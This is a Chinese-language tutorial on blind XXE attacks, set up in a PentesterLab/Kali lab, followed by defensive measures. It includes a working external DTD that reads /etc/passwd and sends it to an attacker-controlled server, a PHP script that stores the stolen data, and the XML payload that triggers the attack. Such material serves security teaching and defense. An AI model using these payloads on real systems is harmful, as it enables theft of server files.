无回显XXE攻击：隐秘的数据泄露技术

引言

在网络安全领域，数据泄露是一个严重的问题，而XXE（XML External Entity）攻击提供了一种隐秘的数据泄露手段。即使在不允许直接输出文件内容的环境中，攻击者也可以通过无回显技术获取敏感信息。本文将探讨无回显XXE攻击的原理、演示攻击过程，并提供相应的防御策略。

无回显XXE攻击基础

无回显XXE攻击是一种在目标服务器不直接显示文件内容的情况下，通过外部实体引用将数据发送到攻击者控制的服务器的技术。这种攻击方式对于隐蔽性和数据泄露尤为有效。

实验环境搭建

为了演示无回显XXE攻击，我们使用PentesterLab虚拟机作为被攻击端，Kali Linux作为攻击者的工作站。首先，需要安装并配置PentesterLab虚拟机，确保其可以接收XXE攻击。

Kali服务器准备工作

在Kali服务器上，我们需要准备以下资源：

1. 外部DTD文件：创建一个DTD文件，用于定义外部实体，该实体指向攻击者想要读取的文件。
2. 接收数据的PHP文件：编写一个PHP脚本，用于接收从目标服务器发送过来的数据。
3. 数据存储文件：创建一个文件，用于存储通过PHP脚本接收的数据。

外部DTD文件示例

<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.1.53/xxe.php?pass=%p1;'>">
%p2;
1
2
3

这个DTD文件定义了两个参数实体，%p1用于读取/etc/passwd文件，%p2用于构造一个URL，将读取到的数据发送到攻击者的服务器。

接收数据的PHP文件示例

<?php
$pass = $_GET['pass'];
file_put_contents('pass.txt', $pass);
?>
1
2
3
4

这个PHP脚本接收一个名为pass的GET参数，并将该参数的内容写入到pass.txt文件中。

进行XXE攻击

1. 停止截断：在Kali中停止截断，确保可以捕获到目标服务器的响应。
2. 构造Payload：构造一个XML Payload，其中包含对外部DTD文件的引用。
3. 发送Payload：通过修改目标服务器的请求包，将Payload发送给目标服务器。

Payload示例

<?xml version="1.0"?>
<!DOCTYPE e1 SYSTEM "http://192.168.1.53/test.dtd">
<foo>&e1;</foo>
1
2
3

这个Payload引用了之前创建的外部DTD文件，触发了数据泄露。

获取数据

一旦Payload被目标服务器解析，攻击者服务器上的PHP脚本将接收到数据，并将数据存储到指定的文件中。攻击者可以通过访问这个文件来获取泄露的数据。

防御策略

1. 升级libxml版本：使用libxml2.9.0或更高版本，这些版本默认不解析外部实体。
2. 代码层防御：在代码中禁用外部实体的解析，例如在PHP中使用libxml_disable_entity_loader(true);。
3. 过滤XML数据：对用户提交的XML数据进行过滤，检查并阻止包含<!DOCTYPE和<!ENTITY的请求。

结语

无回显XXE攻击是一种隐蔽的数据泄露手段，攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍，希望读者能够提高对无回显XXE攻击的认识，并采取相应的防护措施。